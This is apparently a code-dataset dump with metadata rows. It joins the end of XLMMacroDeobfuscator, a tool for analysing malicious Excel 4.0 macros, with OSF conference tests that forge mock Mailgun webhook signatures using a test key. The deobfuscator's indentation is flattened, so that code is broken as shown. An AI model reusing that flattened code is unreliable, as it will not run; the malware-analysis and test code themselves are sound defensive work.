'return_deobfuscated': True,
'day': 0,
'output_formula_format': 'CELL:[[CELL-ADDR]], [[STATUS]], [[INT-FORMULA]]',
'start_point': ''
}
"""
deobfuscated = list()
interpreted_lines = list()
file_path = os.path.abspath(kwargs.get('file'))
file_type = get_file_type(file_path)
password = kwargs.get('password', 'VelvetSweatshop')
uprint('File: {}\n'.format(file_path), silent_mode=SILENT)
if file_type is None:
raise Exception('Input file type is not supported.')
decrypted_file_path = is_encrypted = None
decrypted_file_path, is_encrypted = try_decrypt(file_path, password)
if is_encrypted:
uprint('Encrypted {} file'.format(file_type), silent_mode=SILENT)
if decrypted_file_path is None:
raise Exception(
'Failed to decrypt {}\nUse --password switch to provide the correct password'.format(file_path))
file_path = decrypted_file_path
else:
uprint('Unencrypted {} file\n'.format(file_type), silent_mode=SILENT)
try:
start = time.time()
excel_doc = None
uprint('[Loading Cells]', silent_mode=SILENT)
if file_type == 'xls':
if kwargs.get("no_ms_excel", False):
                print('--no-ms-excel switch is now deprecated (by default, MS Excel is not used)\n'
                      'If you want to use MS Excel, use --with-ms-excel')
if not kwargs.get("with_ms_excel", False):
excel_doc = XLSWrapper2(file_path)
else:
try:
excel_doc = XLSWrapper(file_path)
except Exception as exp:
print("Error: MS Excel is not installed, now xlrd2 library will be used insteads\n" +
"(Use --no-ms-excel switch if you do not have/want to use MS Excel)")
excel_doc = XLSWrapper2(file_path)
elif file_type == 'xlsm':
excel_doc = XLSMWrapper(file_path)
elif file_type == 'xlsb':
excel_doc = XLSBWrapper(file_path)
if excel_doc is None:
raise Exception('Input file type is not supported.')
auto_open_labels = excel_doc.get_defined_name('auto_open', full_match=False)
for label in auto_open_labels:
uprint('auto_open: {}->{}'.format(label[0], label[1]))
if kwargs.get("extract_only"):
if kwargs.get("export_json"):
records = []
for i in show_cells(excel_doc):
if len(i) == 5:
records.append(i)
uprint('[Dumping to Json]', silent_mode=SILENT)
res = convert_to_json_str(file_path, excel_doc.get_defined_names(), records)
try:
output_file_path = kwargs.get("export_json")
print(res)
with open(output_file_path, 'w', encoding='utf_8') as output_file:
output_file.write(json.dumps(res, indent=4))
uprint('Result is dumped into {}'.format(output_file_path), silent_mode=SILENT)
except Exception as exp:
print('Error: unable to dump the result into the specified file\n{}'.format(str(exp)))
                uprint('[End of Dumping]', silent_mode=SILENT)
if not kwargs.get("return_deobfuscated"):
return res
else:
res = []
for i in show_cells(excel_doc):
rec_str = ''
if len(i) == 2:
rec_str = 'SHEET: {}, {}'.format(i[0], i[1])
elif len(i) == 5:
rec_str = 'CELL:{:10}, {:20}, {}'.format(i[0].get_local_address(), i[2], i[4])
if rec_str:
if not kwargs.get("return_deobfuscated"):
uprint(rec_str)
res.append(rec_str)
if kwargs.get("return_deobfuscated"):
return res
else:
uprint('[Starting Deobfuscation]', silent_mode=SILENT)
interpreter = XLMInterpreter(excel_doc, output_level=kwargs.get("output_level", 0))
if kwargs.get("day", 0) > 0:
interpreter.day_of_month = kwargs.get("day")
interactive = not kwargs.get("noninteractive")
if kwargs.get("start_with_shell"):
starting_points = interpreter.xlm_wrapper.get_defined_name('auto_open', full_match=False)
if len(starting_points) == 0:
if len(kwargs.get("start_point")) > 0:
starting_points = [('auto_open', kwargs.get("start_point"))]
elif interactive:
print('There is no entry point, please specify a cell address to start')
print('Example: Sheet1!A1')
auto_open_labels = [('auto_open', input().strip())]
sheet_name, col, row = Cell.parse_cell_addr(starting_points[0][1])
macros = interpreter.xlm_wrapper.get_macrosheets()
if sheet_name in macros:
current_cell = interpreter.get_formula_cell(macros[sheet_name], col, row)
interpreter.interactive_shell(current_cell, "")
output_format = kwargs.get("output_formula_format", 'CELL:[[CELL-ADDR]], [[STATUS]], [[INT-FORMULA]]')
start_point = kwargs.get("start_point", '')
for step in interpreter.deobfuscate_macro(interactive, start_point, brute_force=kwargs["brute"]):
if kwargs.get("return_deobfuscated"):
deobfuscated.append(
get_formula_output(step, output_format, not kwargs.get("no_indent")))
elif kwargs.get("export_json"):
interpreted_lines.append(step)
else:
uprint(get_formula_output(step, output_format, not kwargs.get("no_indent")))
if interpreter.day_of_month is not None:
uprint('[Day of Month] {}'.format(interpreter.day_of_month))
if not kwargs.get("export_json") and not kwargs.get("return_deobfuscated"):
for mem_record in interpreter._memory:
uprint('Memory: base {}, size {}\n{}\n'.format(mem_record['base'],
mem_record['size'],
bytearray(mem_record['data']).hex()))
uprint('\nFiles:\n')
for file in interpreter._files:
if len(interpreter._files[file]['file_content'])>0:
uprint('Files: path {}, access {}\n{}\n'.format(file,
interpreter._files[file]['file_access'],
interpreter._files[file]['file_content']))
uprint('[END of Deobfuscation]', silent_mode=SILENT)
uprint('\n[Intermediate IOCs]\n', silent_mode=SILENT)
for ioc in intermediate_iocs:
uprint(ioc, silent_mode=SILENT)
uprint('\n', silent_mode=SILENT)
if kwargs.get("export_json"):
uprint('[Dumping Json]', silent_mode=SILENT)
res = convert_to_json_str(file_path, excel_doc.get_defined_names(), interpreted_lines,
interpreter._memory, interpreter._files)
try:
output_file_path = kwargs.get("export_json")
with open(output_file_path, 'w', encoding='utf_8') as output_file:
output_file.write(json.dumps(res, indent=4))
uprint('Result is dumped into {}'.format(output_file_path), silent_mode=SILENT)
except Exception as exp:
print('Error: unable to dump the result into the specified file\n{}'.format(str(exp)))
uprint('[End of Dumping]', silent_mode=SILENT)
if kwargs.get("return_deobfuscated"):
return res
uprint('time elapsed: ' + str(time.time() - start), silent_mode=SILENT)
finally:
if HAS_XLSWrapper and type(excel_doc) is XLSWrapper:
excel_doc._excel.Application.DisplayAlerts = False
excel_doc._excel.Application.Quit()
if kwargs.get("return_deobfuscated"):
return deobfuscated
def main():
print(get_logo())
print('XLMMacroDeobfuscator(v{}) - {}\n'.format(__version__,
"https://github.com/DissectMalware/XLMMacroDeobfuscator"))
config_parser = argparse.ArgumentParser(add_help=False)
config_parser.add_argument("-c", "--config-file",
help="Specify a config file (must be a valid JSON file)", metavar="FILE_PATH")
args, remaining_argv = config_parser.parse_known_args()
defaults = {}
if args.config_file:
try:
with open(args.config_file,'r',encoding='utf_8') as config_file:
defaults = json.load(config_file)
defaults = {x.replace('-','_'): y for x, y in defaults.items()}
except json.decoder.JSONDecodeError as json_exp:
uprint(
'Config file cannot be parsed (must be a valid json file, '
'validate your file with an online JSON validator)',
silent_mode=SILENT)
arg_parser = argparse.ArgumentParser(parents=[config_parser])
arg_parser.add_argument("-f", "--file", type=str, action='store',
help="The path of a XLSM file", metavar=('FILE_PATH'))
arg_parser.add_argument("-n", "--noninteractive", default=False, action='store_true',
help="Disable interactive shell")
arg_parser.add_argument("-b", "--brute", default=False, action='store_true',
help="Brute force emulate any cells not covered by structured emulation")
arg_parser.add_argument("-x", "--extract-only", default=False, action='store_true',
help="Only extract cells without any emulation")
arg_parser.add_argument("-2", "--no-ms-excel", default=False, action='store_true',
help="[Deprecated] Do not use MS Excel to process XLS files")
arg_parser.add_argument("--with-ms-excel", default=False, action='store_true',
help="Use MS Excel to process XLS files")
arg_parser.add_argument("-s", "--start-with-shell", default=False, action='store_true',
help="Open an XLM shell before interpreting the macros in the input")
arg_parser.add_argument("-d", "--day", type=int, default=-1, action='store',
help="Specify the day of month", )
arg_parser.add_argument("--output-formula-format", type=str,
default="CELL:[[CELL-ADDR]], [[STATUS]], [[INT-FORMULA]]",
action='store',
help="Specify the format for output formulas "
"([[CELL-ADDR]], [[INT-FORMULA]], and [[STATUS]]", )
arg_parser.add_argument("--no-indent", default=False, action='store_true',
help="Do not show indent before formulas")
arg_parser.add_argument("--export-json", type=str, action='store',
help="Export the output to JSON", metavar=('FILE_PATH'))
arg_parser.add_argument("--start-point", type=str, default="", action='store',
help="Start interpretation from a specific cell address", metavar=('CELL_ADDR'))
arg_parser.add_argument("-p", "--password", type=str, action='store', default='',
help="Password to decrypt the protected document")
arg_parser.add_argument("-o", "--output-level", type=int, action='store', default=0,
help="Set the level of details to be shown "
"(0:all commands, 1: commands no jump "
"2:important commands 3:strings in important commands).")
arg_parser.set_defaults(**defaults)
args = arg_parser.parse_args(remaining_argv)
if not args.file:
print('Error: --file is missing\n')
arg_parser.print_help()
elif not os.path.exists(args.file):
print('Error: input file does not exist')
else:
try:
# Convert args to kwarg dict
try:
process_file(**vars(args))
except Exception as exp:
if debug:
raise exp
exc_type, exc_obj, traceback = sys.exc_info()
frame = traceback.tb_frame
lineno = traceback.tb_lineno
filename = frame.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, frame.f_globals)
print('Error [{}:{} {}]: {}'.format(os.path.basename(filename),
lineno,
line.strip(),
exc_obj))
except KeyboardInterrupt:
pass
SILENT = False
if __name__ == '__main__':
main()
| 46.066331
| 150
| 0.565998
|
794fde5050ffdadb9fbdddde87ba03912918053b
| 27,369
|
py
|
Python
|
tests/test_conferences.py
|
yuanyuan-deng/RDM-osf.io
|
e1c54e97c898d26406d71129db7e4baf82802224
|
[
"Apache-2.0"
] | 1
|
2019-12-23T04:30:20.000Z
|
2019-12-23T04:30:20.000Z
|
tests/test_conferences.py
|
yuanyuan-deng/RDM-osf.io
|
e1c54e97c898d26406d71129db7e4baf82802224
|
[
"Apache-2.0"
] | 17
|
2016-01-27T03:26:00.000Z
|
2019-10-30T13:49:15.000Z
|
tests/test_conferences.py
|
yuanyuan-deng/RDM-osf.io
|
e1c54e97c898d26406d71129db7e4baf82802224
|
[
"Apache-2.0"
] | 1
|
2015-08-28T20:00:52.000Z
|
2015-08-28T20:00:52.000Z
|
# -*- coding: utf-8 -*-
import mock
from nose.tools import * # noqa (PEP8 asserts)
import hmac
import hashlib
from StringIO import StringIO
from django.core.exceptions import ValidationError
from django.db import IntegrityError
import furl
from framework.auth import get_or_create_user
from framework.auth.core import Auth
from osf.models import OSFUser, AbstractNode
from addons.wiki.models import WikiVersion
from osf.exceptions import BlacklistedEmailError
from website import settings
from website.conferences import views
from website.conferences import utils, message
from website.util import api_url_for, web_url_for
from tests.base import OsfTestCase, fake
from osf_tests.factories import ConferenceFactory, ProjectFactory, UserFactory
def assert_absolute(url):
parsed_domain = furl.furl(settings.DOMAIN)
parsed_url = furl.furl(url)
assert_equal(parsed_domain.host, parsed_url.host)
def assert_equal_urls(first, second):
parsed_first = furl.furl(first)
parsed_first.port = None
parsed_second = furl.furl(second)
parsed_second.port = None
assert_equal(parsed_first, parsed_second)
def create_fake_conference_nodes(n, endpoint):
nodes = []
for i in range(n):
node = ProjectFactory(is_public=True)
node.add_tag(endpoint, Auth(node.creator))
node.save()
nodes.append(node)
return nodes
def create_fake_conference_nodes_bad_data(n, bad_n, endpoint):
nodes = []
for i in range(n):
node = ProjectFactory(is_public=True)
node.add_tag(endpoint, Auth(node.creator))
# inject bad data
if i < bad_n:
# Delete only contributor
node.contributor_set.filter(user=node.contributors.first()).delete()
node.save()
nodes.append(node)
return nodes
class TestConferenceUtils(OsfTestCase):
def test_get_or_create_user_exists(self):
user = UserFactory()
fetched, created = get_or_create_user(user.fullname, user.username, is_spam=True)
assert_false(created)
assert_equal(user._id, fetched._id)
assert_false('is_spam' in fetched.system_tags)
def test_get_or_create_user_not_exists(self):
fullname = 'Roger Taylor'
username = 'roger@queen.com'
fetched, created = get_or_create_user(fullname, username, is_spam=False)
fetched.save() # in order to access m2m fields, e.g. tags
assert_true(created)
assert_equal(fetched.fullname, fullname)
assert_equal(fetched.username, username)
assert_false('is_spam' in fetched.system_tags)
def test_get_or_create_user_is_spam(self):
fullname = 'John Deacon'
username = 'deacon@queen.com'
fetched, created = get_or_create_user(fullname, username, is_spam=True)
fetched.save() # in order to access m2m fields, e.g. tags
assert_true(created)
assert_equal(fetched.fullname, fullname)
assert_equal(fetched.username, username)
assert_true('is_spam' in fetched.system_tags)
def test_get_or_create_user_with_blacklisted_domain(self):
fullname = 'Kanye West'
username = 'kanye@mailinator.com'
with assert_raises(BlacklistedEmailError) as e:
get_or_create_user(fullname, username, is_spam=True)
assert_equal(e.exception.message, 'Invalid Email')
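# ContextTestCase swaps in a test Mailgun API key and builds request contexts shaped like Mailgun
# webhook POSTs: the signature field is the HMAC-SHA256 of timestamp + token keyed with the API key,
# mirroring Mailgun's webhook signing scheme.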
class ContextTestCase(OsfTestCase):
MAILGUN_API_KEY = 'mailkimp'
@classmethod
def setUpClass(cls):
super(ContextTestCase, cls).setUpClass()
settings.MAILGUN_API_KEY, cls._MAILGUN_API_KEY = cls.MAILGUN_API_KEY, settings.MAILGUN_API_KEY
@classmethod
def tearDownClass(cls):
super(ContextTestCase, cls).tearDownClass()
settings.MAILGUN_API_KEY = cls._MAILGUN_API_KEY
def make_context(self, method='POST', **kwargs):
data = {
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
}
data.update(kwargs.pop('data', {}))
data = {
key: value
for key, value in data.items()
if value is not None
}
return self.app.app.test_request_context(method=method, data=data, **kwargs)
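    # Illustrative note (not part of the original tests): the 'signature' field above
    # follows Mailgun's webhook signing scheme, i.e. an HMAC-SHA256 over timestamp + token
    # keyed with the API key. A hedged sketch of the check a receiver could perform on the
    # same payload:
    #
    #   expected = hmac.new(
    #       key=settings.MAILGUN_API_KEY,
    #       msg='{}{}'.format(data['timestamp'], data['token']),
    #       digestmod=hashlib.sha256,
    #   ).hexdigest()
    #   assert hmac.compare_digest(expected, data['signature'])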
class TestProvisionNode(ContextTestCase):
def setUp(self):
super(TestProvisionNode, self).setUp()
self.node = ProjectFactory()
self.user = self.node.creator
self.conference = ConferenceFactory()
self.body = 'dragon on my back'
self.content = 'dragon attack'
self.attachment = StringIO(self.content)
self.recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
self.conference.endpoint,
)
def make_context(self, **kwargs):
data = {
'attachment-count': '1',
'attachment-1': (self.attachment, 'attachment-1'),
'X-Mailgun-Sscore': 0,
'recipient': self.recipient,
'stripped-text': self.body,
}
data.update(kwargs.pop('data', {}))
return super(TestProvisionNode, self).make_context(data=data, **kwargs)
def test_provision(self):
with self.make_context():
msg = message.ConferenceMessage()
utils.provision_node(self.conference, msg, self.node, self.user)
assert_true(self.node.is_public)
assert_in(self.conference.admins.first(), self.node.contributors)
assert_in('emailed', self.node.system_tags)
assert_in(self.conference.endpoint, self.node.system_tags)
assert_true(self.node.tags.filter(name=self.conference.endpoint).exists())
assert_not_in('spam', self.node.system_tags)
def test_provision_private(self):
self.conference.public_projects = False
self.conference.save()
with self.make_context():
msg = message.ConferenceMessage()
utils.provision_node(self.conference, msg, self.node, self.user)
assert_false(self.node.is_public)
assert_in(self.conference.admins.first(), self.node.contributors)
assert_in('emailed', self.node.system_tags)
assert_not_in('spam', self.node.system_tags)
def test_provision_spam(self):
with self.make_context(data={'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE + 1}):
msg = message.ConferenceMessage()
utils.provision_node(self.conference, msg, self.node, self.user)
assert_false(self.node.is_public)
assert_in(self.conference.admins.first(), self.node.contributors)
assert_in('emailed', self.node.system_tags)
assert_in('spam', self.node.system_tags)
@mock.patch('website.conferences.utils.waterbutler_api_url_for')
@mock.patch('website.conferences.utils.requests.put')
def test_upload(self, mock_put, mock_get_url):
mock_get_url.return_value = 'http://queen.com/'
file_name = 'hammer-to-fall'
self.attachment.filename = file_name
self.attachment.content_type = 'application/json'
utils.upload_attachment(self.user, self.node, self.attachment)
mock_get_url.assert_called_with(
self.node._id,
'osfstorage',
_internal=True,
base_url=self.node.osfstorage_region.waterbutler_url,
cookie=self.user.get_or_create_cookie(),
name=file_name
)
mock_put.assert_called_with(
mock_get_url.return_value,
data=self.content,
)
@mock.patch('website.conferences.utils.waterbutler_api_url_for')
@mock.patch('website.conferences.utils.requests.put')
def test_upload_no_file_name(self, mock_put, mock_get_url):
mock_get_url.return_value = 'http://queen.com/'
self.attachment.filename = ''
self.attachment.content_type = 'application/json'
utils.upload_attachment(self.user, self.node, self.attachment)
mock_get_url.assert_called_with(
self.node._id,
'osfstorage',
_internal=True,
base_url=self.node.osfstorage_region.waterbutler_url,
cookie=self.user.get_or_create_cookie(),
name=settings.MISSING_FILE_NAME,
)
mock_put.assert_called_with(
mock_get_url.return_value,
data=self.content,
)
@mock.patch('website.conferences.utils.upload_attachments')
def test_add_poster_by_email(self, mock_upload_attachments):
conference = ConferenceFactory()
with self.make_context(data={'from': 'bdawk@sb52champs.com', 'subject': 'It\'s PARTY TIME!'}):
msg = message.ConferenceMessage()
views.add_poster_by_email(conference, msg)
user = OSFUser.objects.get(username='bdawk@sb52champs.com')
assert user.email == 'bdawk@sb52champs.com'
        assert user.fullname == user._id # users shouldn't be able to use the email as fullname, so we use the guid.
class TestMessage(ContextTestCase):
PUSH_CONTEXT = False
def test_verify_signature_valid(self):
with self.make_context():
msg = message.ConferenceMessage()
msg.verify_signature()
def test_verify_signature_invalid(self):
with self.make_context(data={'signature': 'fake'}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.verify_signature()
def test_is_spam_false_missing_headers(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE - 1},
)
with ctx:
msg = message.ConferenceMessage()
assert not msg.is_spam
def test_is_spam_false_all_headers(self):
ctx = self.make_context(
method='POST',
data={
'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE - 1,
'X-Mailgun-Dkim-Check-Result': message.DKIM_PASS_VALUES[0],
'X-Mailgun-Spf': message.SPF_PASS_VALUES[0],
},
)
with ctx:
msg = message.ConferenceMessage()
assert not msg.is_spam
def test_is_spam_true_sscore(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Sscore': message.SSCORE_MAX_VALUE + 1},
)
with ctx:
msg = message.ConferenceMessage()
assert msg.is_spam
def test_is_spam_true_dkim(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Dkim-Check-Result': message.DKIM_PASS_VALUES[0][::-1]},
)
with ctx:
msg = message.ConferenceMessage()
assert msg.is_spam
def test_is_spam_true_spf(self):
ctx = self.make_context(
method='POST',
data={'X-Mailgun-Spf': message.SPF_PASS_VALUES[0][::-1]},
)
with ctx:
msg = message.ConferenceMessage()
assert msg.is_spam
def test_subject(self):
ctx = self.make_context(
method='POST',
data={'subject': 'RE: Hip Hopera'},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(msg.subject, 'Hip Hopera')
def test_recipient(self):
address = 'test-conference@osf.io'
ctx = self.make_context(
method='POST',
data={'recipient': address},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(msg.recipient, address)
def test_text(self):
text = 'welcome to my nuclear family'
ctx = self.make_context(
method='POST',
data={'stripped-text': text},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(msg.text, text)
def test_sender_name(self):
names = [
(' Fred', 'Fred'),
(u'Me䬟', u'Me䬟'),
(u'fred@queen.com', u'fred@queen.com'),
(u'Fred <fred@queen.com>', u'Fred'),
(u'"Fred" <fred@queen.com>', u'Fred'),
]
for name in names:
with self.make_context(data={'from': name[0]}):
msg = message.ConferenceMessage()
assert_equal(msg.sender_name, name[1])
def test_sender_email(self):
emails = [
(u'fred@queen.com', u'fred@queen.com'),
(u'FRED@queen.com', u'fred@queen.com')
]
for email in emails:
with self.make_context(data={'from': email[0]}):
msg = message.ConferenceMessage()
assert_equal(msg.sender_email, email[1])
def test_route_invalid_pattern(self):
with self.make_context(data={'recipient': 'spam@osf.io'}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.route
def test_route_invalid_test(self):
recipient = '{0}conf-talk@osf.io'.format('' if settings.DEV_MODE else 'stage-')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.route
def test_route_valid_alternate(self):
conf = ConferenceFactory(endpoint='chocolate', active=True)
conf.name = 'Chocolate Conference'
conf.field_names['submission2'] = 'data'
conf.save()
recipient = '{0}chocolate-data@osf.io'.format('test-' if settings.DEV_MODE else '')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
assert_equal(msg.conference_name, 'chocolate')
assert_equal(msg.conference_category, 'data')
conf.__class__.delete(conf)
def test_route_valid_b(self):
recipient = '{0}conf-poster@osf.io'.format('test-' if settings.DEV_MODE else '')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
assert_equal(msg.conference_name, 'conf')
assert_equal(msg.conference_category, 'poster')
def test_alternate_route_invalid(self):
recipient = '{0}chocolate-data@osf.io'.format('test-' if settings.DEV_MODE else '')
with self.make_context(data={'recipient': recipient}):
self.app.app.preprocess_request()
msg = message.ConferenceMessage()
with assert_raises(message.ConferenceError):
msg.route
def test_attachments_count_zero(self):
with self.make_context(data={'attachment-count': '0'}):
msg = message.ConferenceMessage()
assert_equal(msg.attachments, [])
def test_attachments_count_one(self):
content = 'slightly mad'
sio = StringIO(content)
ctx = self.make_context(
method='POST',
data={
'attachment-count': 1,
'attachment-1': (sio, 'attachment-1'),
},
)
with ctx:
msg = message.ConferenceMessage()
assert_equal(len(msg.attachments), 1)
assert_equal(msg.attachments[0].read(), content)
class TestConferenceEmailViews(OsfTestCase):
def test_redirect_to_meetings_url(self):
url = '/presentations/'
res = self.app.get(url)
assert_equal(res.status_code, 302)
res = res.follow()
assert_equal(res.request.path, '/meetings/')
def test_conference_submissions(self):
AbstractNode.objects.all().delete()
conference1 = ConferenceFactory()
conference2 = ConferenceFactory()
# Create conference nodes
create_fake_conference_nodes(
3,
conference1.endpoint,
)
create_fake_conference_nodes(
2,
conference2.endpoint,
)
url = api_url_for('conference_submissions')
res = self.app.get(url)
assert_equal(res.json['success'], True)
def test_conference_plain_returns_200(self):
conference = ConferenceFactory()
url = web_url_for('conference_results__plain', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
def test_conference_data(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
create_fake_conference_nodes(
n_conference_nodes,
conference.endpoint,
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes)
# Regression for OSF-8864 to confirm bad project data does not make whole conference break
def test_conference_bad_data(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
n_conference_nodes_bad = 1
create_fake_conference_nodes_bad_data(
n_conference_nodes,
n_conference_nodes_bad,
conference.endpoint,
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes - n_conference_nodes_bad)
def test_conference_data_url_upper(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
create_fake_conference_nodes(
n_conference_nodes,
conference.endpoint,
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint.upper())
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes)
def test_conference_data_tag_upper(self):
conference = ConferenceFactory()
# Create conference nodes
n_conference_nodes = 3
create_fake_conference_nodes(
n_conference_nodes,
conference.endpoint.upper(),
)
# Create a non-conference node
ProjectFactory()
url = api_url_for('conference_data', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
assert_equal(len(res.json), n_conference_nodes)
def test_conference_results(self):
conference = ConferenceFactory()
url = web_url_for('conference_results', meeting=conference.endpoint)
res = self.app.get(url)
assert_equal(res.status_code, 200)
def test_confererence_results_endpoint_is_case_insensitive(self):
ConferenceFactory(endpoint='StudySwap')
url = web_url_for('conference_results', meeting='studyswap')
res = self.app.get(url)
assert_equal(res.status_code, 200)
class TestConferenceModel(OsfTestCase):
def test_endpoint_is_required(self):
with assert_raises(IntegrityError):
ConferenceFactory(endpoint=None, name=fake.company()).save()
def test_name_is_required(self):
with assert_raises(IntegrityError):
ConferenceFactory(endpoint='spsp2014', name=None).save()
def test_default_field_names(self):
conf = ConferenceFactory(endpoint='cookie', name='Cookies Conference')
conf.save()
assert_equal(conf.field_names['submission1'], 'poster')
assert_equal(conf.field_names['mail_subject'], 'Presentation title')
class TestConferenceIntegration(ContextTestCase):
@mock.patch('website.conferences.views.send_mail')
@mock.patch('website.conferences.utils.upload_attachments')
def test_integration(self, mock_upload, mock_send_mail):
fullname = 'John Deacon'
username = 'deacon@queen.com'
title = 'good songs'
conference = ConferenceFactory()
body = 'dragon on my back'
content = 'dragon attack'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': '{0} <{1}>'.format(fullname, username),
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
upload_files=[
('attachment-1', 'attachment-1', content),
],
)
assert_true(mock_upload.called)
users = OSFUser.objects.filter(username=username)
assert_equal(users.count(), 1)
nodes = AbstractNode.objects.filter(title=title)
assert_equal(nodes.count(), 1)
node = nodes[0]
assert_equal(WikiVersion.objects.get_for_node(node, 'home').content, body)
assert_true(mock_send_mail.called)
call_args, call_kwargs = mock_send_mail.call_args
assert_absolute(call_kwargs['conf_view_url'])
assert_absolute(call_kwargs['set_password_url'])
assert_absolute(call_kwargs['profile_url'])
assert_absolute(call_kwargs['file_url'])
assert_absolute(call_kwargs['node_url'])
@mock.patch('website.conferences.views.send_mail')
def test_integration_inactive(self, mock_send_mail):
conference = ConferenceFactory(active=False)
fullname = 'John Deacon'
username = 'deacon@queen.com'
title = 'good songs'
body = 'dragon on my back'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
res = self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': '{0} <{1}>'.format(fullname, username),
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
expect_errors=True,
)
assert_equal(res.status_code, 406)
call_args, call_kwargs = mock_send_mail.call_args
assert_equal(call_args, (username, views.CONFERENCE_INACTIVE))
assert_equal(call_kwargs['fullname'], fullname)
assert_equal_urls(
call_kwargs['presentations_url'],
web_url_for('conference_view', _absolute=True),
)
@mock.patch('website.conferences.views.send_mail')
@mock.patch('website.conferences.utils.upload_attachments')
def test_integration_wo_full_name(self, mock_upload, mock_send_mail):
username = 'no_full_name@mail.com'
title = 'no full name only email'
conference = ConferenceFactory()
body = 'dragon on my back'
content = 'dragon attack'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': username,
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
upload_files=[
('attachment-1', 'attachment-1', content),
],
)
assert_true(mock_upload.called)
users = OSFUser.objects.filter(username=username)
assert_equal(users.count(), 1)
nodes = AbstractNode.objects.filter(title=title)
assert_equal(nodes.count(), 1)
node = nodes[0]
assert_equal(WikiVersion.objects.get_for_node(node, 'home').content, body)
assert_true(mock_send_mail.called)
call_args, call_kwargs = mock_send_mail.call_args
assert_absolute(call_kwargs['conf_view_url'])
assert_absolute(call_kwargs['set_password_url'])
assert_absolute(call_kwargs['profile_url'])
assert_absolute(call_kwargs['file_url'])
assert_absolute(call_kwargs['node_url'])
@mock.patch('website.conferences.views.send_mail')
@mock.patch('website.conferences.utils.upload_attachments')
def test_create_conference_node_with_same_name_as_existing_node(self, mock_upload, mock_send_mail):
conference = ConferenceFactory()
user = UserFactory()
title = 'Long Live Greg'
ProjectFactory(creator=user, title=title)
body = 'Greg is a good plant'
content = 'Long may they reign.'
recipient = '{0}{1}-poster@osf.io'.format(
'test-' if settings.DEV_MODE else '',
conference.endpoint,
)
self.app.post(
api_url_for('meeting_hook'),
{
'X-Mailgun-Sscore': 0,
'timestamp': '123',
'token': 'secret',
'signature': hmac.new(
key=settings.MAILGUN_API_KEY,
msg='{}{}'.format('123', 'secret'),
digestmod=hashlib.sha256,
).hexdigest(),
'attachment-count': '1',
'X-Mailgun-Sscore': 0,
'from': '{0} <{1}>'.format(user.fullname, user.username),
'recipient': recipient,
'subject': title,
'stripped-text': body,
},
upload_files=[
('attachment-1', 'attachment-1', content),
],
)
assert AbstractNode.objects.filter(title=title, creator=user).count() == 2
assert mock_upload.called
assert mock_send_mail.called
| 36.736913
| 114
| 0.610654
|
794fdf3beaeacf64fdd917baf3bf4576c15628a8
| 851
|
py
|
Python
|
DESAFIO-064.py
|
Lukones/Evolution-Projetos-Python
|
d979f3702f0e22ab5256b19fd957dba587c44f85
|
[
"MIT"
] | null | null | null |
DESAFIO-064.py
|
Lukones/Evolution-Projetos-Python
|
d979f3702f0e22ab5256b19fd957dba587c44f85
|
[
"MIT"
] | null | null | null |
